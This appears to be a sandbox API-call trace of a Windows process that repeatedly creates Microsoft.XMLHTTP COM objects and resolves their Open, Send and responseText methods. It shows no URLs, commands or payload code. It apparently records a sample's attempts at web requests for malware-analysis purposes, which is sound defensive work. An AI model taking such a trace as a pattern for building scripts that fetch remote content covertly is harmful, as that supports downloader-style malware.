	[0714.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.782] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0714.782] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0714.782] ??2@YAPEAX_K@Z () returned 0x62f330
	[0714.782] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0714.782] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.782] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0714.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0714.782] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0714.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.783] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.785] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.786] SysStringLen (param_1=0x0) returned 0x0
	[0714.786] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0714.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.786] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0714.786] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0714.786] ??2@YAPEAX_K@Z () returned 0x62f310
	[0714.786] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0714.786] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.786] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0714.786] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0714.786] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0714.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.787] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.787] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.787] SysStringLen (param_1=0x0) returned 0x0
	[0714.787] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0714.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.787] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0714.787] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0714.788] ??2@YAPEAX_K@Z () returned 0x62f330
	[0714.788] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0714.788] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.788] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0714.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0714.788] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0714.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.788] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.788] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.788] SysStringLen (param_1=0x0) returned 0x0
	[0714.789] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0714.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.789] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0714.789] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0714.789] ??2@YAPEAX_K@Z () returned 0x62f310
	[0714.789] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0714.789] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.789] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0714.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0714.789] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0714.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.790] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.790] longjmp () 
	[0714.790] longjmp () 
	[0714.790] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.790] SysStringLen (param_1=0x0) returned 0x0
	[0714.790] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0714.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.790] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0714.790] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0714.791] ??2@YAPEAX_K@Z () returned 0x62f330
	[0714.791] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0714.791] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.791] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0714.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0714.791] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0714.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.791] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.791] longjmp () 
	[0714.792] longjmp () 
	[0714.792] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0714.792] SysStringLen (param_1=0x0) returned 0x0
	[0714.792] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0714.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0714.792] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0714.792] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0714.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0714.792] ??2@YAPEAX_K@Z () returned 0x62f310
	[0714.792] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0714.792] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0714.792] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0714.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0714.793] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0714.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.793] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0714.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0714.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0714.793] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0714.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0715.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0715.050] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0715.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
